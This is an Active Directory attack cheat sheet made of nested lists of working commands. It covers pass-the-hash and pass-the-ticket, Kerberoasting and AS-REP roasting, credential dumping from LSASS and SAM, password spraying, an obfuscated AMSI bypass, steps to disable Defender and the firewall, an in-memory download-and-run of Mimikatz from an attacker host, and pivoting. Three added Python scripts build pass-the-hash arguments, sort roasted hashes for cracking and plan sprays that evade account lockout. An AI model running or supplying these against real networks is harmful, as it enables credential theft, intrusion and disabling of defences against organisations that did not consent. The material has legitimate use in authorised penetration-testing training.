1. Designed by: Youssef Saeed
  2. @y0u553f5433d
  3. Icons
    1. PowerView
    2. Noisy
    3. Mimikatz
    4. Linux
    5. Rubeus
  4. Accessing
    1. Already have access (your current account is admin on the target)?
      1. winrs
        1. winrs -r:<HOSTNAME> cmd
      2. PsExec
        1. .\PsExec.exe \\<HOSTNAME> cmd
      3. PS-Session (interactive)
        1. $sess = New-PSSession -ComputerName <HOST>
        2. Enter-PSSession -Session $sess
      4. Script Block (non-interactive, runs the block remotely)
        1. $sess = New-PSSession -ComputerName <HOST>
        2. Invoke-Command -Session $sess -ScriptBlock {ipconfig; whoami; pwd}
      5. WSManWinRM
        1. Invoke-WSManWinRM -hostname <HOST> -command cmd
    2. Have Password?
      1. winrs -r:<HOST> -u:<DOMAIN>\<USER> -p:<PASS> cmd
      2. .\PsExec.exe -u <DOMAIN>\<USER> -p <PASS> \\<HOSTNAME> cmd
      3. impacket-psexec <Full.Domain>/<USER>:<PASS>@<IP>
      4. WSManWinRM
        1. Invoke-WSManWinRM -hostname <HOST> -command cmd -user <DOMAIN>\<USER> -password <PASS>
      5. evil-winrm -i <IP> -u <USER> -p <PASS>
      6. RDP Access
        1. rdesktop -a 16 -d <DOMAIN> -u <USER> -p <PASS> <IP>
        2. xfreerdp /v:<IP> /d:<DOMAIN> /u:<USER> /p:<PASS>
    3. Pass The Hash (PTH)
      1. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM> /run:powershell.exe"'
      2. impacket-psexec -hashes ":<NTLM>" <USER>@<IP>   (-hashes takes LM:NT; the LM half may be left empty)
      3. evil-winrm -i <IP> -u <USER> -H <NTLM>
      4. pth-winexe -U <DOMAIN>/<USER>%aad3b435b51404eeaad3b435b51404ee:<NTLM> //<IP> cmd   (LM:NT order; the LM value shown is the empty-LM constant)
      5. Impacket for Windows
        1. .\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
      6. Invoke-TheHash
        1. Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Domain> -Username <USER> -Hash <NTLM> -Command '<COMMAND>' -Verbose
      7. RDP: pass-the-hash over RDP works only when Restricted Admin mode is enabled on the target
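Every PTH entry above takes an NT hash, and impacket's `-hashes` and pth-winexe's `%` syntax want it in `LM:NT` form. The following is an added example, not code from the cheat sheet: it computes the NT hash (MD4 over the UTF-16LE password) and builds both argument forms, so you can turn a recovered cleartext into a PTH argument or check a password guess offline against a dumped hash without touching the target. MD4 is implemented inline because `hashlib.new('md4')` is unavailable under the default OpenSSL 3 provider on many systems. The domain, user and IP in the demo are placeholders.

```python
"""NT hash from a cleartext password, plus the LM:NT argument formats used for pass-the-hash.

Added example, not from the original cheat sheet. NT = MD4(UTF-16LE(password)).
The NT hash of 'password' is the well-known 8846f7eaee8fb117ad06bdd830b7586c.
"""
import struct

MASK = 0xFFFFFFFF
# LM hash of an empty/disabled LM password, the value seen in most modern dumps
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 over little-endian 64-byte blocks."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        # (boolean function, X index order, per-step shifts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + f(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so 'a' is always the one being updated
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def impacket_hashes_arg(nt: str, lm: str = "") -> str:
    """Value for impacket's -hashes: 'LM:NT'; LM may be empty, as in the ':<NTLM>' form above."""
    return f"{lm}:{nt}"


def pth_winexe_creds(domain: str, user: str, nt: str) -> str:
    """pth-winexe -U value: DOMAIN/user%LM:NT, using the empty-LM constant when LM is unknown."""
    return f"{domain}/{user}%{EMPTY_LM}:{nt}"


def password_matches(nt: str, candidate: str) -> bool:
    """Offline check of a guessed password against a dumped NT hash (no lockout risk)."""
    return nt_hash(candidate) == nt.lower()


if __name__ == "__main__":
    nt = nt_hash("password")
    print("NT hash      :", nt)
    print("impacket     :", f'impacket-psexec -hashes "{impacket_hashes_arg(nt)}" svc_backup@10.10.10.5')
    print("pth-winexe -U:", pth_winexe_creds("CORP", "svc_backup", nt))
    print("guess ok?    :", password_matches(nt, "Password"))  # case matters, so False
```

`password_matches` is the cheap pre-check before a spray: if you already hold a user's NT hash, test guesses locally instead of burning attempts against the lockout threshold.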
    4. OverPass The Hash (OPTH) / Pass The Key (PTK)
      1. Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
        1. .\PsExec.exe -accepteula \\<HOST> cmd
        2. winrs -r:<HOST> cmd
      2. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<AES256_KEY> /run:cmd.exe"'
      3. Impacket (Linux side)
        1. impacket-getTGT <Full.Domain>/<USER> -hashes ":<NTLM>"
        2. export KRB5CCNAME=$(pwd)/<USER>.ccache
        3. impacket-psexec -k -no-pass <Full.Domain>/<USER>@<HOST.Full.Domain>   (with Kerberos, target the hostname, not the IP: the service ticket is requested for the host's SPN)
    5. Pass The Ticket (PTT)
      1. Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
      2. Rubeus.exe ptt /ticket:<base64 ticket>
      3. Access
        1. .\PsExec.exe -accepteula \\<HOST> cmd
        2. winrs -r:<HOST> cmd
  5. Enumeration
    1. BloodHound Enum
      1. BloodHound
        1. SharpHound.ps1
          1. Invoke-BloodHound -CollectionMethod All
          2. Invoke-BloodHound -CollectionMethod All -ExcludeDCs
    2. PowerView Enum
    3. Advanced Domain Enumeration
      1. Local Admin Access
        1. Find-LocalAdminAccess -Verbose
        2. Find-WMILocalAdminAccess.ps1
        3. Find-PSRemotingLocalAdminAccess.ps1
      2. Cleartext passwords stored in the userPassword attribute
        1. $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
      3. Kerberoasting
        1. Find SPNs
          1. Get-DomainUser -SPN | select samaccountname,serviceprincipalname
          2. impacket-GetUserSPNs -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD>
          3. Rubeus.exe kerberoast /stats
        2. Set SPNs (targeted Kerberoasting of a user you can write to)
          1. First check whether the user already has an SPN
            1. Get-DomainUser -Identity <USER> | select serviceprincipalname
          2. SPN present? Roast it (Lateral Movement > Kerberoasting). None? Set one (Lateral Movement > Kerberoasting > Set SPN)
        3. SPNs found? Continue under Lateral Movement > Kerberoasting
      4. ASREPRoast
        1. Get-DomainUser -PreauthNotRequired -Verbose
        2. impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD>
        3. ASREPRoast.ps1
          1. Invoke-ASREPRoast -Verbose
      5. Accounts found? Continue under Lateral Movement > ASREPRoast
    4. Important
  6. Lateral Movement
    1. Kerberoasting
      1. Found SPN
        1. Extract Hashes
          1. Specific account
            1. Rubeus.exe kerberoast /user:<USER> /rc4opsec /outfile:hashes.txt
            2. Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat|John> | % { $_.Hash } > hashes.txt
            3. impacket-GetUserSPNs -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -request-user <TARGET_USER> -outputfile hashes.txt
          2. All accounts
            1. Invoke-Kerberoast.ps1
              1. Invoke-Kerberoast -OutputFormat <Hashcat|John> | % { $_.Hash } > hashes.txt
            2. Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat|John> > hashes.txt
            3. Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
            4. crackmapexec ldap <DC-IP> -u <USER> -p <PASS> --kerberoasting hashes.txt
            5. impacket-GetUserSPNs -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
          3. From memory to disk (export the service tickets already cached in the session as .kirbi files)
            1. kerberos::list /export
        2. Cracking Hashes
          1. John
            1. john --wordlist=<wordlist path> hashes.txt
          2. Hashcat
            1. hashcat -m 13100 -a 0 hashes.txt <wordlist path>
        3. If the SPN inside a hash carries a port (for example MSSQLSvc/host:1433), remove the ':port' before cracking
      2. Set SPN (needs write access to the target user's servicePrincipalName attribute)
        1. Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='<Service>/<Name>'}
    2. ASREPRoast
      1. Dumping Hashes
        1. Specific account
          1. ASREPRoast.ps1
            1. Get-ASREPHash -UserName <USER> -Verbose
        2. All accounts
          1. Rubeus.exe asreproast /format:<hashcat|john> /outfile:hashes.txt
          2. crackmapexec ldap <DC-IP> -u <USER> -p <PASS> --asreproast hashes.txt
          3. GetNPUsers
            1. With credentials: impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat|john> -outputfile hashes.txt
            2. With a user list only (no credentials): impacket-GetNPUsers -request -dc-ip <IP> -usersfile users.txt <Full.Domain>/ -format <hashcat|john> -outputfile hashes.txt
      2. Cracking Hashes
        1. John
          1. john --wordlist=<wordlist path> hashes.txt
        2. Hashcat
          1. hashcat -m 18200 -a 0 hashes.txt <wordlist path>
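Both cracking steps above hand tool output straight to hashcat, and two things go wrong in practice: a `$krb5tgs$23$` line whose SPN carries a `:port` (the "remove the port" step under Kerberoasting) and a mixed dump that contains both TGS-REP (mode 13100) and AS-REP (mode 18200) lines, which hashcat cannot crack in one run. The following is an added example, not code from the cheat sheet or any of the tools it lists: it normalises the lines and buckets them per hashcat mode. Stripping the port is cryptographically harmless, since the SPN field is not part of the computation. The sample lines are constructed and their ciphertext is truncated; real lines are thousands of hex characters long.

```python
"""Pre-crack cleanup for Kerberoast / AS-REP roast output (added example, not from the cheat sheet)."""
import re
from typing import Dict, List, Optional

# hashcat mode and john --format per hash prefix; only the RC4 (etype 23) variants this page uses
HASH_TYPES = {
    "$krb5tgs$23$": (13100, "krb5tgs"),
    "$krb5asrep$23$": (18200, "krb5asrep"),
}

# $krb5tgs$23$*user$REALM$spn*$checksum$edata2 : the SPN sits between the '$' after the realm and the '*'
_TGS_LINE = re.compile(r"^(\$krb5tgs\$23\$\*[^$*]+\$[^$*]+\$)([^*]+)(\*\$.+)$")

SAMPLE_LINES = [  # constructed sample; ciphertext truncated
    "$krb5tgs$23$*sqlsvc$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$3f1a9c2e8d7b6a5f$0d4f77ab19c3e2d8",
    "$krb5tgs$23$*websvc$CORP.LOCAL$HTTP/web01.corp.local*$77ab0d4f19c3e2d8$3f1a9c2e8d7b6a5f",
    "$krb5asrep$23$jdoe@CORP.LOCAL:5e1ca8b7d9f03c21$a8b75e1c3c21d9f0",
    "",
]


def strip_spn_port(line: str) -> str:
    """Drop a trailing ':<port>' from the SPN of a $krb5tgs$23$ line; any other line passes through."""
    m = _TGS_LINE.match(line)
    if not m:
        return line
    head, spn, tail = m.groups()
    return head + re.sub(r":\d+$", "", spn) + tail


def hashcat_mode(line: str) -> Optional[int]:
    """hashcat -m value for a line, or None when the prefix is not one we know."""
    for prefix, (mode, _) in HASH_TYPES.items():
        if line.startswith(prefix):
            return mode
    return None


def split_for_cracking(lines) -> Dict[int, List[str]]:
    """Normalise lines and bucket them by hashcat mode; unknown formats raise instead of vanishing silently."""
    buckets: Dict[int, List[str]] = {}
    for raw in lines:
        line = strip_spn_port(raw.strip())
        if not line:
            continue
        mode = hashcat_mode(line)
        if mode is None:
            raise ValueError(f"unrecognised hash format: {line[:24]}...")
        buckets.setdefault(mode, []).append(line)
    return buckets


def cracking_commands(buckets: Dict[int, List[str]], wordlist: str) -> List[str]:
    """One hashcat and one john invocation per mode, reading <mode>.txt as written by main() below."""
    cmds = []
    for mode in sorted(buckets):
        john_fmt = next(fmt for m, fmt in HASH_TYPES.values() if m == mode)
        cmds.append(f"hashcat -m {mode} -a 0 {mode}.txt {wordlist}")
        cmds.append(f"john --format={john_fmt} --wordlist={wordlist} {mode}.txt")
    return cmds


if __name__ == "__main__":
    buckets = split_for_cracking(SAMPLE_LINES)
    for mode, hashes in buckets.items():
        with open(f"{mode}.txt", "w") as fh:
            fh.write("\n".join(hashes) + "\n")
        print(f"{mode}.txt: {len(hashes)} hash(es)")
    for cmd in cracking_commands(buckets, "/usr/share/wordlists/rockyou.txt"):
        print(cmd)
```

Feed it the concatenated `hashes.txt` files from the Rubeus, impacket and CrackMapExec runs above; AES (etype 17/18) lines are deliberately rejected so you notice them rather than silently losing them.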
  7. Dumping Credentials
    1. Tools
      1. mimikatz
        1. mimikatz.exe
        2. Invoke-Mimikatz.ps1
        3. SharpKatz.exe
        4. pypykatz
    2. Creds in memory (LSASS)
      1. MimiKatz
        1. Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
        2. Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
      2. CrackMapExec (dumps LSA secrets from the registry hives, not LSASS memory; for LSASS over the network see lsassy below)
        1. crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
      3. procdump
        1. Get-Process -Name lsass   (note the Id)
        2. .\procdump.exe -accepteula -ma <PID> lsass.dmp
      4. lsassy
        1. lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
    3. Local Creds (SAM)
      1. SecretDump
        1. reg save HKLM\sam sam
        2. reg save HKLM\system system
        3. reg save HKLM\security security
        4. impacket-secretsdump -sam sam -security security -system system LOCAL
      2. MimiKatz
        1. Invoke-Mimikatz -Command '"lsadump::sam"'
      3. CrackMapExec
        1. crackmapexec smb <IP> -u <USER> -p <PASS> --sam
    4. Credential Manager (vault), including credentials saved for scheduled tasks
      1. MimiKatz
        1. Invoke-Mimikatz -Command '"vault::cred /patch"'
  8. Spraying
    1. Password Spray
      1. CrackMapExec
        1. Spray As Domain user
          1. crackmapexec smb <IP> -d <domain> -u users.txt -p passwords.txt
        2. Spray As Local user
          1. crackmapexec smb <IP> -u users.txt -p passwords.txt --local-auth
    2. Hash Spray
      1. CrackMapExec
        1. Spray As Domain user
          1. crackmapexec smb <IP> -d <domain> -u users.txt -H hashes.txt
        2. Spray As Local user
          1. crackmapexec smb <IP> -u users.txt -H hashes.txt --local-auth
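The sprays above try every entry of passwords.txt against every user in one go, which locks accounts wherever a lockout policy exists. The following is an added example, not from the cheat sheet or CrackMapExec: it reads the domain lockout policy from the output of `net accounts /domain` (run on any domain-joined host), keeps each account under the threshold within one observation window, and emits the crackmapexec lines in the form used above, one password per run with a sleep of one window between rounds. The `net accounts` text, the target IP, domain and passwords are all constructed.

```python
"""Lockout-aware password spray planning (added example, not from the cheat sheet)."""
import re
import shlex
from typing import List, Optional

NET_ACCOUNTS_SAMPLE = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""  # constructed sample of 'net accounts /domain' output


def parse_lockout_policy(text: str) -> dict:
    """Return {'threshold': int|None, 'window_minutes': int|None}; 'Never' means lockout is disabled."""
    policy = {"threshold": None, "window_minutes": None}
    m = re.search(r"^Lockout threshold:\s+(\S+)", text, re.M)
    if m and m.group(1).isdigit():
        policy["threshold"] = int(m.group(1))
    m = re.search(r"^Lockout observation window \(minutes\):\s+(\d+)", text, re.M)
    if m:
        policy["window_minutes"] = int(m.group(1))
    return policy


def plan_spray(passwords: List[str], threshold: Optional[int], safety_margin: int = 2) -> List[List[str]]:
    """Split passwords into rounds of at most (threshold - safety_margin) attempts per account per window.
    The margin leaves room for the user's own failed logons inside the same window."""
    if threshold is None:
        return [list(passwords)]  # no lockout policy: a single round
    per_round = threshold - safety_margin
    if per_round < 1:
        raise ValueError(f"lockout threshold {threshold} leaves no safe attempts per window")
    return [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]


def spray_commands(rounds: List[List[str]], target: str, domain: str,
                   users_file: str, window_minutes: Optional[int]) -> List[str]:
    """crackmapexec lines, one password per run, with one observation window of sleep between rounds."""
    cmds: List[str] = []
    for n, batch in enumerate(rounds):
        if n:
            cmds.append(f"sleep {(window_minutes or 30) * 60 + 60}")  # window plus a minute of slack
        for pw in batch:
            cmds.append(f"crackmapexec smb {target} -d {domain} -u {users_file} -p {shlex.quote(pw)}")
    return cmds


if __name__ == "__main__":
    policy = parse_lockout_policy(NET_ACCOUNTS_SAMPLE)
    rounds = plan_spray(["Winter2024!", "Spring2024!", "Summer2024!", "Autumn2024!"], policy["threshold"])
    for line in spray_commands(rounds, "10.10.10.5", "corp.local", "users.txt", policy["window_minutes"]):
        print(line)
```

For the `--local-auth` sprays the domain policy does not apply; read the local policy with `net accounts` (without `/domain`) on a target of the same build instead.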
  9. Gained Access
    1. Have Reverse Shell?
      1. Enable PS-Remoting
        1. powershell -ep bypass -c "Enable-PSRemoting -Force"
      2. Enable RDP
        1. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    2. Persistence
      1. Add user to local Administrators
        1. net localgroup Administrators <Domain\USER> /add
    3. Security Bypass
      1. PowerShell
        1. Current Language Mode
          1. $ExecutionContext.SessionState.LanguageMode
        2. Execution Policy Bypass
          1. powershell -ExecutionPolicy bypass
          2. powershell -c <cmd>
          3. powershell -EncodedCommand <base64 of the UTF-16LE command>
          4. $env:PSExecutionPolicyPreference="bypass"
          5. Bypassed? Re-check the language mode and execution policy before loading tools
      2. AMSI
        1. AMSI Bypass PowerShell Command
          1. S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
    4. Importing your modules
      1. Import Local file
        1. Import-Module .\PowerView.ps1
        2. . .\PowerUp.ps1
      2. Import in memory
        1. powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-Mimikatz.ps1')"
    5. Stop security controls
      1. Defender
        1. Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
        2. Set-MpPreference -DisableIOAVProtection $true
        3. Disable script scanning (Defender's AMSI-backed script inspection; AMSI itself stays loaded)
          1. Set-MpPreference -DisableScriptScanning 1
      2. Firewall
        1. netsh firewall set opmode disable
        2. netsh advfirewall set allprofiles state off
    6. Pivoting
      1. Chisel
        1. On your Kali
          1. ./chisel server -p 80 --reverse   (the reverse SOCKS proxy then listens on Kali at 127.0.0.1:1080)
        2. On Pivoting Point
          1. .\Chisel.exe client <Your_IP>:80 R:1080:socks